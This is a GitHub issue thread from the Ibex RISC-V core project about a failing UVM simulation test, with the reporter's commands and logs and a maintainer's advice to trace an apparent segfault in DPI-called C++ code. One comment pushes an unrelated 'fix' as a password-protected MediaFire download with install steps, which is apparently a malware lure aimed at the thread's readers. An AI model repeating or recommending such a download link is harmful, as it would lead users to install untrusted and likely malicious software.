lowRISC/ibex #2210: Report a bug in Ibex|

ThanhDo288, 2024-08-27:
make clean & make --keep-going IBEX_CONFIG=opentitan SIMULATOR=xlm ISS=spike ITERATIONS=1 SEED=1 TEST=riscv_arithmetic_basic_test WAVES=0 COV=0

There is some error when run a subprocess with command xrun -64bit -R -xmlibdirpath /home/usr21/ibex/dv/uvm/core_ibex/out/build/tb -licqueue -svseed 1 -svrnc rand_struct -nokey -l /home/usr21/ibex/dv/uvm/core_ibex/out/run/tests/riscv_arithmetic_basic_test.1/rtl_sim.log +UVM_TESTNAME=core_ibex_base_test +UVM_VERBOSITY=UVM_LOW +bin=/home/usr21/ibex/dv/uvm/core_ibex/out/run/tests/riscv_arithmetic_basic_test.1/test.bin +ibex_tracer_file_base=/home/usr21/ibex/dv/uvm/core_ibex/out/run/tests/riscv_arithmetic_basic_test.1/trace_core +cosim_log_file=/home/usr21/ibex/dv/uvm/core_ibex/out/run/tests/riscv_arithmetic_basic_test.1/spike_cosim_trace_core_00000000.log +signature_addr=8ffffffc +test_timeout_s=1800

Collecting simulation results and checking logs of testcase at /home/usr21/ibex/dv/uvm/core_ibex/out/run/tests/riscv_arithmetic_basic_test.1/trr.yaml
Collecting up results of tests into report regr.log
0.00% PASS 0 PASSED, 1 FAILED

amir1387aht, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

rswarbrick, 2024-08-28:
I'm not sure exactly what's going wrong, but the symptom is a segfault in the simulation binary (which presumably happens after some memory corruption that's trashing the string holding the path that gets reported afterwards).

To debug it further, you'll need to add some debug prints to figure out what code is running. I suspect it will be some C++ function that we're running over DPI. Then add some prints to that code (to stderr so it doesn't get buffered) to figure out exactly what is exploding.